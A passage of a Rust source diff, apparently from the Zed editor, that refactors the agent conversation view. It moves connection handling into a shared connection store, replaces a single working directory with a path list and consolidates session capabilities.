- PermissionOptions, RetryStatus, ThreadStatus, ToolCall, ToolCallContent, ToolCallStatus,
- UserMessageId,
+ PermissionOptions, PermissionPattern, RetryStatus, SelectedPermissionOutcome, ThreadStatus,
+ ToolCall, ToolCallContent, ToolCallStatus, UserMessageId,
};
use acp_thread::{AgentConnection, Plan};
-use action_log::{ActionLog, ActionLogTelemetry};
+use action_log::{ActionLog, ActionLogTelemetry, DiffStats};
use agent::{NativeAgentServer, NativeAgentSessionList, SharedThread, ThreadStore};
-use agent_client_protocol::{self as acp, PromptCapabilities};
-use agent_servers::{AgentServer, AgentServerDelegate};
+use agent_client_protocol as acp;
+#[cfg(test)]
+use agent_servers::AgentServerDelegate;
+use agent_servers::{AgentServer, GEMINI_TERMINAL_AUTH_METHOD_ID};
use agent_settings::{AgentProfileId, AgentSettings};
use anyhow::{Result, anyhow};
-use arrayvec::ArrayVec;
use audio::{Audio, Sound};
use buffer_diff::BufferDiff;
use client::zed_urls;
@@ -34,17 +35,20 @@ use gpui::{
use language::Buffer;
use language_model::LanguageModelRegistry;
use markdown::{Markdown, MarkdownElement, MarkdownFont, MarkdownStyle};
-use project::{AgentServerStore, ExternalAgentServerName, Project, ProjectEntryId};
+use parking_lot::RwLock;
+use project::{AgentId, AgentServerStore, Project, ProjectEntryId};
use prompt_store::{PromptId, PromptStore};
+
+use crate::DEFAULT_THREAD_TITLE;
+use crate::message_editor::SessionCapabilities;
use rope::Point;
use settings::{NotifyWhenAgentWaiting, Settings as _, SettingsStore};
-use std::cell::RefCell;
-use std::path::{Path, PathBuf};
+use std::path::Path;
use std::sync::Arc;
use std::time::Instant;
use std::{collections::BTreeMap, rc::Rc, time::Duration};
use terminal_view::terminal_panel::TerminalPanel;
-use text::{Anchor, ToPoint as _};
+use text::Anchor;
use theme::AgentFontSize;
use ui::{
Callout, CircularProgress, CommonAnimationExt, ContextMenu, ContextMenuEntry, CopyButton,
@@ -54,6 +58,7 @@ use ui::{
};
use util::{ResultExt, size::format_file_size, time::duration_alt_display};
use util::{debug_panic, defer};
+use workspace::PathList;
use workspace::{
CollaboratorId, MultiWorkspace, NewTerminal, Toast, Workspace, notifications::NotificationId,
};
@@ -65,18 +70,22 @@ use super::entry_view_state::EntryViewState;
use super::thread_history::ThreadHistory;
use crate::ModeSelector;
use crate::ModelSelectorPopover;
+use crate::agent_connection_store::{
+ AgentConnectedState, AgentConnectionEntryEvent, AgentConnectionStore,
+};
use crate::agent_diff::AgentDiff;
use crate::entry_view_state::{EntryViewEvent, ViewEvent};
use crate::message_editor::{MessageEditor, MessageEditorEvent};
use crate::profile_selector::{ProfileProvider, ProfileSelector};
+use crate::thread_metadata_store::SidebarThreadMetadataStore;
use crate::ui::{AgentNotification, AgentNotificationEvent};
use crate::{
- AgentDiffPane, AgentInitialContent, AgentPanel, AllowAlways, AllowOnce, AuthorizeToolCall,
- ClearMessageQueue, CycleFavoriteModels, CycleModeSelector, CycleThinkingEffort,
- EditFirstQueuedMessage, ExpandMessageEditor, Follow, KeepAll, NewThread, OpenAddContextMenu,
- OpenAgentDiff, OpenHistory, RejectAll, RejectOnce, RemoveFirstQueuedMessage, SendImmediately,
- SendNextQueuedMessage, ToggleFastMode, ToggleProfileSelector, ToggleThinkingEffortMenu,
- ToggleThinkingMode, UndoLastReject,
+ Agent, AgentDiffPane, AgentInitialContent, AgentPanel, AllowAlways, AllowOnce,
+ AuthorizeToolCall, ClearMessageQueue, CycleFavoriteModels, CycleModeSelector,
+ CycleThinkingEffort, EditFirstQueuedMessage, ExpandMessageEditor, Follow, KeepAll, NewThread,
+ OpenAddContextMenu, OpenAgentDiff, OpenHistory, RejectAll, RejectOnce,
+ RemoveFirstQueuedMessage, SendImmediately, SendNextQueuedMessage, ToggleFastMode,
+ ToggleProfileSelector, ToggleThinkingEffortMenu, ToggleThinkingMode, UndoLastReject,
};
const STOPWATCH_THRESHOLD: Duration = Duration::from_secs(30);
@@ -155,73 +164,51 @@ pub(crate) struct Conversation {
threads: HashMap<acp::SessionId, Entity<AcpThread>>,
permission_requests: IndexMap<acp::SessionId, Vec<acp::ToolCallId>>,
subscriptions: Vec<Subscription>,
- /// Tracks the selected granularity index for each tool call's permission dropdown.
- /// The index corresponds to the position in the allow_options list.
- selected_permission_granularity: HashMap<acp::SessionId, HashMap<acp::ToolCallId, usize>>,
+ updated_at: Option<Instant>,
}
impl Conversation {
pub fn register_thread(&mut self, thread: Entity<AcpThread>, cx: &mut Context<Self>) {
let session_id = thread.read(cx).session_id().clone();
- let subscription = cx.subscribe(&thread, move |this, _thread, event, _cx| match event {
- AcpThreadEvent::ToolAuthorizationRequested(id) => {
- this.permission_requests
- .entry(session_id.clone())
- .or_default()
- .push(id.clone());
- }
- AcpThreadEvent::ToolAuthorizationReceived(id) => {
- if let Some(tool_calls) = this.permission_requests.get_mut(&session_id) {
- tool_calls.retain(|tool_call_id| tool_call_id != id);
- if tool_calls.is_empty() {
- this.permission_requests.shift_remove(&session_id);
+ let subscription = cx.subscribe(&thread, move |this, _thread, event, _cx| {
+ this.updated_at = Some(Instant::now());
+ match event {
+ AcpThreadEvent::ToolAuthorizationRequested(id) => {
+ this.permission_requests
+ .entry(session_id.clone())
+ .or_default()
+ .push(id.clone());
+ }
+ AcpThreadEvent::ToolAuthorizationReceived(id) => {
+ if let Some(tool_calls) = this.permission_requests.get_mut(&session_id) {
+ tool_calls.retain(|tool_call_id| tool_call_id != id);
+ if tool_calls.is_empty() {
+ this.permission_requests.shift_remove(&session_id);
+ }
}
}
+ AcpThreadEvent::NewEntry
+ | AcpThreadEvent::TitleUpdated
+ | AcpThreadEvent::TokenUsageUpdated
+ | AcpThreadEvent::EntryUpdated(_)
+ | AcpThreadEvent::EntriesRemoved(_)
+ | AcpThreadEvent::Retry(_)
+ | AcpThreadEvent::SubagentSpawned(_)
+ | AcpThreadEvent::Stopped(_)
+ | AcpThreadEvent::Error
+ | AcpThreadEvent::LoadError(_)
+ | AcpThreadEvent::PromptCapabilitiesUpdated
+ | AcpThreadEvent::Refusal
+ | AcpThreadEvent::AvailableCommandsUpdated(_)
+ | AcpThreadEvent::ModeUpdated(_)
+ | AcpThreadEvent::ConfigOptionsUpdated(_) => {}
}
- AcpThreadEvent::NewEntry
- | AcpThreadEvent::TitleUpdated
- | AcpThreadEvent::TokenUsageUpdated
- | AcpThreadEvent::EntryUpdated(_)
- | AcpThreadEvent::EntriesRemoved(_)
- | AcpThreadEvent::Retry(_)
- | AcpThreadEvent::SubagentSpawned(_)
- | AcpThreadEvent::Stopped(_)
- | AcpThreadEvent::Error
- | AcpThreadEvent::LoadError(_)
- | AcpThreadEvent::PromptCapabilitiesUpdated
- | AcpThreadEvent::Refusal
- | AcpThreadEvent::AvailableCommandsUpdated(_)
- | AcpThreadEvent::ModeUpdated(_)
- | AcpThreadEvent::ConfigOptionsUpdated(_) => {}
});
self.subscriptions.push(subscription);
self.threads
.insert(thread.read(cx).session_id().clone(), thread);
}
- pub fn selected_permission_granularity(
- &self,
- session_id: &acp::SessionId,
- tool_call_id: &acp::ToolCallId,
- ) -> Option<usize> {
- self.selected_permission_granularity
- .get(session_id)
- .and_then(|map| map.get(tool_call_id))
- .copied()
- }
-
- pub fn set_selected_permission_granularity(
- &mut self,
- session_id: acp::SessionId,
- tool_call_id: acp::ToolCallId,
- granularity: usize,
- ) {
- self.selected_permission_granularity
- .entry(session_id)
- .or_default()
- .insert(tool_call_id, granularity);
- }
-
pub fn pending_tool_call<'a>(
&'a self,
session_id: &acp::SessionId,
@@ -261,8 +248,7 @@ impl Conversation {
self.authorize_tool_call(
session_id.clone(),
tool_call_id,
- option.option_id.clone(),
- option.kind,
+ SelectedPermissionOutcome::new(option.option_id.clone(), option.kind),
cx,
);
Some(())
@@ -272,8 +258,7 @@ impl Conversation {
&mut self,
session_id: acp::SessionId,
tool_call_id: acp::ToolCallId,
- option_id: acp::PermissionOptionId,
- option_kind: acp::PermissionOptionKind,
+ outcome: SelectedPermissionOutcome,
cx: &mut Context<Self>,
) {
let Some(thread) = self.threads.get(&session_id) else {
@@ -285,11 +270,11 @@ impl Conversation {
"Agent Tool Call Authorized",
agent = agent_telemetry_id,
session = session_id,
- option = option_kind
+ option = outcome.option_kind
);
thread.update(cx, |thread, cx| {
- thread.authorize_tool_call(tool_call_id, option_id, option_kind, cx);
+ thread.authorize_tool_call(tool_call_id, outcome, cx);
});
cx.notify();
}
@@ -299,17 +284,18 @@ pub enum AcpServerViewEvent {
ActiveThreadChanged,
}
-impl EventEmitter<AcpServerViewEvent> for ConnectionView {}
+impl EventEmitter<AcpServerViewEvent> for ConversationView {}
-pub struct ConnectionView {
+pub struct ConversationView {
agent: Rc<dyn AgentServer>,
+ connection_store: Entity<AgentConnectionStore>,
+ connection_key: Agent,
agent_server_store: Entity<AgentServerStore>,
workspace: WeakEntity<Workspace>,
project: Entity<Project>,
thread_store: Option<Entity<ThreadStore>>,
prompt_store: Option<Entity<PromptStore>>,
server_state: ServerState,
- history: Entity<ThreadHistory>,
focus_handle: FocusHandle,
notifications: Vec<WindowHandle<AgentNotification>>,
notification_subscriptions: HashMap<WindowHandle<AgentNotification>, Vec<Subscription>>,
@@ -317,7 +303,7 @@ pub struct ConnectionView {
_subscriptions: Vec<Subscription>,
}
-impl ConnectionView {
+impl ConversationView {
pub fn has_auth_methods(&self) -> bool {
self.as_connected().map_or(false, |connected| {
!connected.connection.auth_methods().is_empty()
@@ -342,7 +328,7 @@ impl ConnectionView {
.pending_tool_call(id, cx)
}
- pub fn parent_thread(&self, cx: &App) -> Option<Entity<ThreadView>> {
+ pub fn root_thread(&self, cx: &App) -> Option<Entity<ThreadView>> {
match &self.server_state {
ServerState::Connected(connected) => {
let mut current = connected.active_view()?;
@@ -378,6 +364,11 @@ impl ConnectionView {
}
}
+ pub fn updated_at(&self, cx: &App) -> Option<Instant> {
+ self.as_connected()
+ .and_then(|connected| connected.conversation.read(cx).updated_at)
+ }
+
pub fn navigate_to_session(
&mut self,
session_id: acp::SessionId,
@@ -413,7 +404,9 @@ pub struct ConnectedServerState {
active_id: Option<acp::SessionId>,
threads: HashMap<acp::SessionId, Entity<ThreadView>>,
connection: Rc<dyn AgentConnection>,
+ history: Option<Entity<ThreadHistory>>,
conversation: Entity<Conversation>,
+ _connection_entry_subscription: Subscription,
}
enum AuthState {
@@ -434,9 +427,7 @@ impl AuthState {
struct LoadingView {
session_id: Option<acp::SessionId>,
- title: SharedString,
_load_task: Task<()>,
- _update_title_task: Task<anyhow::Result<()>>,
}
impl ConnectedServerState {
@@ -456,10 +447,13 @@ impl ConnectedServerState {
}
pub fn close_all_sessions(&self, cx: &mut App) -> Task<()> {
- let tasks = self
- .threads
- .keys()
- .map(|id| self.connection.close_session(id, cx));
+ let tasks = self.threads.keys().filter_map(|id| {
+ if self.connection.supports_close_session() {
+ Some(self.connection.clone().close_session(id, cx))
+ } else {
+ None
+ }
+ });
let task = futures::future::join_all(tasks);
cx.background_spawn(async move {
task.await;
@@ -467,18 +461,19 @@ impl ConnectedServerState {
}
}
-impl ConnectionView {
+impl ConversationView {
pub fn new(
agent: Rc<dyn AgentServer>,
+ connection_store: Entity<AgentConnectionStore>,
+ connection_key: Agent,
resume_session_id: Option<acp::SessionId>,
- cwd: Option<PathBuf>,
+ work_dirs: Option<PathList>,
title: Option<SharedString>,
initial_content: Option<AgentInitialContent>,
workspace: WeakEntity<Workspace>,
project: Entity<Project>,
thread_store: Option<Entity<ThreadStore>>,
prompt_store: Option<Entity<PromptStore>>,
- history: Entity<ThreadHistory>,
window: &mut Window,
cx: &mut Context<Self>,
) -> Self {
@@ -509,6 +504,8 @@ impl ConnectionView {
Self {
agent: agent.clone(),
+ connection_store: connection_store.clone(),
+ connection_key: connection_key.clone(),
agent_server_store,
workspace,
project: project.clone(),
@@ -516,8 +513,10 @@ impl ConnectionView {
prompt_store,
server_state: Self::initial_state(
agent.clone(),
+ connection_store,
+ connection_key,
resume_session_id,
- cwd,
+ work_dirs,
title,
project,
initial_content,
@@ -527,7 +526,6 @@ impl ConnectionView {
notifications: Vec::new(),
notification_subscriptions: HashMap::default(),
auth_task: None,
- history,
_subscriptions: subscriptions,
focus_handle: cx.focus_handle(),
}
@@ -550,14 +548,16 @@ impl ConnectionView {
let thread = thread_view.read(cx).thread.read(cx);
(
Some(thread.session_id().clone()),
- thread.cwd().cloned(),
- Some(thread.title()),
+ thread.work_dirs().cloned(),
+ thread.title(),
)
})
.unwrap_or((None, None, None));
let state = Self::initial_state(
self.agent.clone(),
+ self.connection_store.clone(),
+ self.connection_key.clone(),
resume_session_id,
cwd,
title,
@@ -571,11 +571,7 @@ impl ConnectionView {
if let Some(view) = self.active_thread() {
view.update(cx, |this, cx| {
this.message_editor.update(cx, |editor, cx| {
- editor.set_command_state(
- this.prompt_capabilities.clone(),
- this.available_commands.clone(),
- cx,
- );
+ editor.set_session_capabilities(this.session_capabilities.clone(), cx);
});
});
}
@@ -584,8 +580,10 @@ impl ConnectionView {
fn initial_state(
agent: Rc<dyn AgentServer>,
+ connection_store: Entity<AgentConnectionStore>,
+ connection_key: Agent,
resume_session_id: Option<acp::SessionId>,
- cwd: Option<PathBuf>,
+ work_dirs: Option<PathList>,
title: Option<SharedString>,
project: Entity<Project>,
initial_content: Option<AgentInitialContent>,
@@ -602,67 +600,36 @@ impl ConnectionView {
session_id: resume_session_id.clone(),
};
}
- let mut worktrees = project.read(cx).visible_worktrees(cx).collect::<Vec<_>>();
- // Pick the first non-single-file worktree for the root directory if there are any,
- // and otherwise the parent of a single-file worktree, falling back to $HOME if there are no visible worktrees.
- worktrees.sort_by(|l, r| {
- l.read(cx)
- .is_single_file()
- .cmp(&r.read(cx).is_single_file())
+ let session_work_dirs = work_dirs.unwrap_or_else(|| project.read(cx).default_path_list(cx));
+
+ let connection_entry = connection_store.update(cx, |store, cx| {
+ store.request_connection(connection_key, agent.clone(), cx)
});
- let worktree_roots: Vec<Arc<Path>> = worktrees
- .iter()
- .filter_map(|worktree| {
- let worktree = worktree.read(cx);
- if worktree.is_single_file() {
- Some(worktree.abs_path().parent()?.into())
- } else {
- Some(worktree.abs_path())
+
+ let connection_entry_subscription =
+ cx.subscribe(&connection_entry, |this, _entry, event, cx| match event {
+ AgentConnectionEntryEvent::NewVersionAvailable(version) => {
+ if let Some(thread) = this.active_thread() {
+ thread.update(cx, |thread, cx| {
+ thread.new_server_version_available = Some(version.clone());
+ cx.notify();
+ });
+ }
}
- })
- .collect();
- let session_cwd = cwd
- .filter(|cwd| {
- // Validate with the normalized path (rejects `..` traversals),
- // but return the original cwd to preserve its path separators.
- // On Windows, `normalize_lexically` rebuilds the path with
- // backslashes via `PathBuf::push`, which would corrupt
- // forward-slash Linux paths used by WSL agents.
- util::paths::normalize_lexically(cwd)
- .ok()
- .is_some_and(|normalized| {
- worktree_roots
- .iter()
- .any(|root| normalized.starts_with(root.as_ref()))
- })
- })
- .map(|path| path.into())
- .or_else(|| worktree_roots.first().cloned())
- .unwrap_or_else(|| paths::home_dir().as_path().into());
-
- let (status_tx, mut status_rx) = watch::channel("Loading…".into());
- let (new_version_available_tx, mut new_version_available_rx) = watch::channel(None);
- let delegate = AgentServerDelegate::new(
- project.read(cx).agent_server_store().clone(),
- project.clone(),
- Some(status_tx),
- Some(new_version_available_tx),
- );
+ });
+
+ let connect_result = connection_entry.read(cx).wait_for_connection();
- let connect_task = agent.connect(delegate, cx);
let load_session_id = resume_session_id.clone();
let load_task = cx.spawn_in(window, async move |this, cx| {
- let connection = match connect_task.await {
- Ok(connection) => connection,
+ let (connection, history) = match connect_result.await {
+ Ok(AgentConnectedState {
+ connection,
+ history,
+ }) => (connection, history),
Err(err) => {
this.update_in(cx, |this, window, cx| {
- if err.downcast_ref::<LoadError>().is_some() {
- this.handle_load_error(load_session_id.clone(), err, window, cx);
- } else if let Some(active) = this.active_thread() {
- active.update(cx, |active, cx| active.handle_thread_error(err, cx));
- } else {
- this.handle_load_error(load_session_id.clone(), err, window, cx);
- }
+ this.handle_load_error(load_session_id.clone(), err, window, cx);
cx.notify();
})
.log_err();
@@ -679,7 +646,7 @@ impl ConnectionView {
connection.clone().load_session(
session_id,
project.clone(),
- &session_cwd,
+ session_work_dirs,
title,
cx,
)
@@ -688,7 +655,7 @@ impl ConnectionView {
connection.clone().resume_session(
session_id,
project.clone(),
- &session_cwd,
+ session_work_dirs,
title,
cx,
)
@@ -703,7 +670,7 @@ impl ConnectionView {
cx.update(|_, cx| {
connection
.clone()
- .new_session(project.clone(), session_cwd.as_ref(), cx)
+ .new_session(project.clone(), session_work_dirs, cx)
})
.log_err()
};
@@ -719,7 +686,7 @@ impl ConnectionView {
Self::handle_auth_required(
this,
err,
- agent.name(),
+ agent.agent_id(),
connection,
window,
cx,
@@ -748,6 +715,7 @@ impl ConnectionView {
conversation.clone(),
resumed_without_history,
initial_content,
+ history.clone(),
window,
cx,
);
@@ -761,14 +729,6 @@ impl ConnectionView {
}
let id = current.read(cx).thread.read(cx).session_id().clone();
- let session_list = if connection.supports_session_history() {
- connection.session_list(cx)
- } else {
- None
- };
- this.history.update(cx, |history, cx| {
- history.set_session_list(session_list, cx);
- });
this.set_server_state(
ServerState::Connected(ConnectedServerState {
connection,
@@ -776,52 +736,28 @@ impl ConnectionView {
active_id: Some(id.clone()),
threads: HashMap::from_iter([(id, current)]),
conversation,
+ history,
+ _connection_entry_subscription: connection_entry_subscription,
}),
cx,
);
}
Err(err) => {
- this.handle_load_error(load_session_id.clone(), err, window, cx);
+ this.handle_load_error(
+ load_session_id.clone(),
+ LoadError::Other(err.to_string().into()),
+ window,
+ cx,
+ );
}
};
})
.log_err();
});
- cx.spawn(async move |this, cx| {
- while let Ok(new_version) = new_version_available_rx.recv().await {
- if let Some(new_version) = new_version {
- this.update(cx, |this, cx| {
- if let Some(thread) = this.active_thread() {
- thread.update(cx, |thread, _cx| {
- thread.new_server_version_available = Some(new_version.into());
- });
- }
- cx.notify();
- })
- .ok();
- }
- }
- })
- .detach();
-
- let loading_view = cx.new(|cx| {
- let update_title_task = cx.spawn(async move |this, cx| {
- loop {
- let status = status_rx.recv().await?;
- this.update(cx, |this: &mut LoadingView, cx| {
- this.title = status;
- cx.notify();
- })?;
- }
- });
-
- LoadingView {
- session_id: resume_session_id,
- title: "Loading…".into(),
- _load_task: load_task,
- _update_title_task: update_title_task,
- }
+ let loading_view = cx.new(|_cx| LoadingView {
+ session_id: resume_session_id,
+ _load_task: load_task,
});
ServerState::Loading(loading_view)
@@ -834,27 +770,27 @@ impl ConnectionView {
conversation: Entity<Conversation>,
resumed_without_history: bool,
initial_content: Option<AgentInitialContent>,
+ history: Option<Entity<ThreadHistory>>,
window: &mut Window,
cx: &mut Context<Self>,
) -> Entity<ThreadView> {
- let agent_name = self.agent.name();
- let prompt_capabilities = Rc::new(RefCell::new(acp::PromptCapabilities::default()));
- let available_commands = Rc::new(RefCell::new(vec![]));
+ let agent_id = self.agent.agent_id();
+ let session_capabilities = Arc::new(RwLock::new(SessionCapabilities::new(
+ thread.read(cx).prompt_capabilities(),
+ vec![],
+ )));
let action_log = thread.read(cx).action_log().clone();
- prompt_capabilities.replace(thread.read(cx).prompt_capabilities());
-
let entry_view_state = cx.new(|_| {
EntryViewState::new(
self.workspace.clone(),
self.project.downgrade(),
self.thread_store.clone(),
- self.history.downgrade(),
+ history.as_ref().map(|h| h.downgrade()),
self.prompt_store.clone(),
- prompt_capabilities.clone(),
- available_commands.clone(),
- self.agent.name(),
+ session_capabilities.clone(),
+ self.agent.agent_id(),
)
});
@@ -977,19 +913,19 @@ impl ConnectionView {
let agent_display_name = self
.agent_server_store
.read(cx)
- .agent_display_name(&ExternalAgentServerName(agent_name.clone()))
- .unwrap_or_else(|| agent_name.clone());
+ .agent_display_name(&agent_id.clone())
+ .unwrap_or_else(|| agent_id.0.clone());
let agent_icon = self.agent.logo();
let agent_icon_from_external_svg = self
.agent_server_store
.read(cx)
- .agent_icon(&ExternalAgentServerName(self.agent.name()))
+ .agent_icon(&self.agent.agent_id())
.or_else(|| {
project::AgentRegistryStore::try_global(cx).and_then(|store| {
store
.read(cx)
- .agent(self.agent.name().as_ref())
+ .agent(&self.agent.agent_id())
.and_then(|a| a.icon_path().cloned())
})
});
@@ -1003,7 +939,7 @@ impl ConnectionView {
weak,
agent_icon,
agent_icon_from_external_svg,
- agent_name,
+ agent_id,
agent_display_name,
self.workspace.clone(),
entry_view_state,
@@ -1012,12 +948,11 @@ impl ConnectionView {
model_selector,
profile_selector,
list_state,
- prompt_capabilities,
- available_commands,
+ session_capabilities,
resumed_without_history,
self.project.downgrade(),
self.thread_store.clone(),
- self.history.clone(),
+ history,
self.prompt_store.clone(),
initial_content,
subscriptions,
@@ -1030,7 +965,7 @@ impl ConnectionView {
fn handle_auth_required(
this: WeakEntity<Self>,
err: AuthRequired,
- agent_name: SharedString,
+ agent_id: AgentId,
connection: Rc<dyn AgentConnection>,
window: &mut Window,
cx: &mut App,
@@ -1059,7 +994,7 @@ impl ConnectionView {
let view = registry.read(cx).provider(&provider_id).map(|provider| {
provider.configuration_view(
- language_model::ConfigurationViewTargetAgent::Other(agent_name),
+ language_model::ConfigurationViewTargetAgent::Other(agent_id.0),
window,
cx,
)
@@ -1099,6 +1034,8 @@ impl ConnectionView {
threads: HashMap::default(),
connection,
conversation: cx.new(|_cx| Conversation::default()),
+ history: None,
+ _connection_entry_subscription: Subscription::new(|| {}),
}),
cx,
);
@@ -1111,7 +1048,7 @@ impl ConnectionView {
fn handle_load_error(
&mut self,
session_id: Option<acp::SessionId>,
- err: anyhow::Error,
+ err: LoadError,
window: &mut Window,
cx: &mut Context<Self>,
) {
@@ -1125,15 +1062,10 @@ impl ConnectionView {
self.focus_handle.focus(window, cx)
}
}
- let load_error = if let Some(load_err) = err.downcast_ref::<LoadError>() {
- load_err.clone()
- } else {
- LoadError::Other(format!("{:#}", err).into())
- };
- self.emit_load_error_telemetry(&load_error);
+ self.emit_load_error_telemetry(&err);
self.set_server_state(
ServerState::LoadError {
- error: load_error,
+ error: err,
session_id,
},
cx,
@@ -1174,15 +1106,20 @@ impl ConnectionView {
pub fn title(&self, cx: &App) -> SharedString {
match &self.server_state {
- ServerState::Connected(_) => "New Thread".into(),
- ServerState::Loading(loading_view) => loading_view.read(cx).title.clone(),
+ ServerState::Connected(view) => view
+ .active_view()
+ .and_then(|v| v.read(cx).thread.read(cx).title())
+ .unwrap_or_else(|| DEFAULT_THREAD_TITLE.into()),
+ ServerState::Loading(_) => "Loading…".into(),
ServerState::LoadError { error, .. } => match error {
- LoadError::Unsupported { .. } => format!("Upgrade {}", self.agent.name()).into(),
+ LoadError::Unsupported { .. } => {
+ format!("Upgrade {}", self.agent.agent_id()).into()
+ }
LoadError::FailedToInstall(_) => {
- format!("Failed to Install {}", self.agent.name()).into()
+ format!("Failed to Install {}", self.agent.agent_id()).into()
}
- LoadError::Exited { .. } => format!("{} Exited", self.agent.name()).into(),
- LoadError::Other(_) => format!("Error Loading {}", self.agent.name()).into(),
+ LoadError::Exited { .. } => format!("{} Exited", self.agent.agent_id()).into(),
+ LoadError::Other(_) => format!("Error Loading {}", self.agent.agent_id()).into(),
},
}
}
@@ -1199,7 +1136,7 @@ impl ConnectionView {
pub fn parent_id(&self, cx: &App) -> Option<acp::SessionId> {
match &self.server_state {
ServerState::Connected(_) => self
- .parent_thread(cx)
+ .root_thread(cx)
.map(|thread| thread.read(cx).id.clone()),
ServerState::Loading(loading) => loading.read(cx).session_id.clone(),
ServerState::LoadError { session_id, .. } => session_id.clone(),
@@ -1236,12 +1173,19 @@ impl ConnectionView {
&mut self,
index: usize,
inserted_text: Option<&str>,
+ cursor_offset: Option<usize>,
window: &mut Window,
cx: &mut Context<Self>,
) {
if let Some(active) = self.active_thread() {
active.update(cx, |active, cx| {
- active.move_queued_message_to_main_editor(index, inserted_text, window, cx);
+ active.move_queued_message_to_main_editor(
+ index,
+ inserted_text,
+ cursor_offset,
+ window,
+ cx,
+ );
});
}
}
@@ -1274,13 +1218,14 @@ impl ConnectionView {
}
}
AcpThreadEvent::EntryUpdated(index) => {
- if let Some(entry_view_state) = self
- .thread_view(&thread_id)
- .map(|active| active.read(cx).entry_view_state.clone())
- {
+ if let Some(active) = self.thread_view(&thread_id) {
+ let entry_view_state = active.read(cx).entry_view_state.clone();
entry_view_state.update(cx, |view_state, cx| {
view_state.sync_entry(*index, thread, window, cx)
});
+ active.update(cx, |active, cx| {
+ active.auto_expand_streaming_thought(cx);
+ });
}
}
AcpThreadEvent::EntriesRemoved(range) => {
@@ -1312,6 +1257,7 @@ impl ConnectionView {
if let Some(active) = self.thread_view(&thread_id) {
active.update(cx, |active, _cx| {
active.thread_retry_status.take();
+ active.clear_auto_expand_tracking();
});
}
if is_subagent {
@@ -1412,8 +1358,9 @@ impl ConnectionView {
);
}
AcpThreadEvent::TitleUpdated => {
- let title = thread.read(cx).title();
- if let Some(active_thread) = self.thread_view(&thread_id) {
+ if let Some(title) = thread.read(cx).title()
+ && let Some(active_thread) = self.thread_view(&thread_id)
+ {
let title_editor = active_thread.read(cx).title_editor.clone();
title_editor.update(cx, |editor, cx| {
if editor.text(cx) != title {
@@ -1427,8 +1374,9 @@ impl ConnectionView {
if let Some(active) = self.thread_view(&thread_id) {
active.update(cx, |active, _cx| {
active
- .prompt_capabilities
- .replace(thread.read(_cx).prompt_capabilities());
+ .session_capabilities
+ .write()
+ .set_prompt_capabilities(thread.read(_cx).prompt_capabilities());
});
}
}
@@ -1444,7 +1392,7 @@ impl ConnectionView {
.connection()
.auth_methods()
.iter()
- .any(|method| method.id.0.as_ref() == "claude-login")
+ .any(|method| method.id().0.as_ref() == "claude-login")
{
available_commands.push(acp::AvailableCommand::new("login", "Authenticate"));
available_commands.push(acp::AvailableCommand::new("logout", "Authenticate"));
@@ -1453,15 +1401,18 @@ impl ConnectionView {
let has_commands = !available_commands.is_empty();
if let Some(active) = self.active_thread() {
active.update(cx, |active, _cx| {
- active.available_commands.replace(available_commands);
+ active
+ .session_capabilities
+ .write()
+ .set_available_commands(available_commands);
});
}
let agent_display_name = self
.agent_server_store
.read(cx)
- .agent_display_name(&ExternalAgentServerName(self.agent.name()))
- .unwrap_or_else(|| self.agent.name());
+ .agent_display_name(&self.agent.agent_id())
+ .unwrap_or_else(|| self.agent.agent_id().0.to_string().into());
if let Some(active) = self.active_thread() {
let new_placeholder =
@@ -1491,6 +1442,9 @@ impl ConnectionView {
window: &mut Window,
cx: &mut Context<Self>,
) {
+ let Some(workspace) = self.workspace.upgrade() else {
+ return;
+ };
let Some(connected) = self.as_connected_mut() else {
return;
};
@@ -1507,114 +1461,65 @@ impl ConnectionView {
let agent_telemetry_id = connection.telemetry_id();
- // Check for the experimental "terminal-auth" _meta field
- let auth_method = connection.auth_methods().iter().find(|m| m.id == method);
-
- if let Some(terminal_auth) = auth_method
- .and_then(|a| a.meta.as_ref())
- .and_then(|m| m.get("terminal-auth"))
- {
- // Extract terminal auth details from meta
- if let (Some(command), Some(label)) = (
- terminal_auth.get("command").and_then(|v| v.as_str()),
- terminal_auth.get("label").and_then(|v| v.as_str()),
- ) {
- let args = terminal_auth
- .get("args")
- .and_then(|v| v.as_array())
- .map(|arr| {
- arr.iter()
- .filter_map(|v| v.as_str().map(String::from))
- .collect()
- })
- .unwrap_or_default();
-
- let env = terminal_auth
- .get("env")
- .and_then(|v| v.as_object())
- .map(|obj| {
- obj.iter()
- .filter_map(|(k, v)| v.as_str().map(|val| (k.clone(), val.to_string())))
- .collect::<HashMap<String, String>>()
- })
- .unwrap_or_default();
-
- // Build SpawnInTerminal from _meta
- let login = task::SpawnInTerminal {
- id: task::TaskId(format!("external-agent-{}-login", label)),
- full_label: label.to_string(),
- label: label.to_string(),
- command: Some(command.to_string()),
- args,
- command_label: label.to_string(),
- env,
- use_new_terminal: true,
- allow_concurrent_runs: true,
- hide: task::HideStrategy::Always,
- ..Default::default()
- };
+ if let Some(login) = connection.terminal_auth_task(&method, cx) {
+ configuration_view.take();
+ pending_auth_method.replace(method.clone());
- configuration_view.take();
- pending_auth_method.replace(method.clone());
-
- if let Some(workspace) = self.workspace.upgrade() {
- let project = self.project.clone();
- let authenticate = Self::spawn_external_agent_login(
- login,
- workspace,
- project,
- method.clone(),
- false,
- window,
- cx,
- );
- cx.notify();
- self.auth_task = Some(cx.spawn_in(window, {
- async move |this, cx| {
- let result = authenticate.await;
-
- match &result {
- Ok(_) => telemetry::event!(
- "Authenticate Agent Succeeded",
- agent = agent_telemetry_id
- ),
- Err(_) => {
- telemetry::event!(
- "Authenticate Agent Failed",
- agent = agent_telemetry_id,
- )
- }
- }
+ let project = self.project.clone();
+ let authenticate = Self::spawn_external_agent_login(
+ login,
+ workspace,
+ project,
+ method.clone(),
+ false,
+ window,
+ cx,
+ );
+ cx.notify();
+ self.auth_task = Some(cx.spawn_in(window, {
+ async move |this, cx| {
+ let result = authenticate.await;
+
+ match &result {
+ Ok(_) => telemetry::event!(
+ "Authenticate Agent Succeeded",
+ agent = agent_telemetry_id
+ ),
+ Err(_) => {
+ telemetry::event!(
+ "Authenticate Agent Failed",
+ agent = agent_telemetry_id,
+ )
+ }
+ }
- this.update_in(cx, |this, window, cx| {
- if let Err(err) = result {
- if let Some(ConnectedServerState {
- auth_state:
- AuthState::Unauthenticated {
- pending_auth_method,
- ..
- },
+ this.update_in(cx, |this, window, cx| {
+ if let Err(err) = result {
+ if let Some(ConnectedServerState {
+ auth_state:
+ AuthState::Unauthenticated {
+ pending_auth_method,
..
- }) = this.as_connected_mut()
- {
- pending_auth_method.take();
- }
- if let Some(active) = this.active_thread() {
- active.update(cx, |active, cx| {
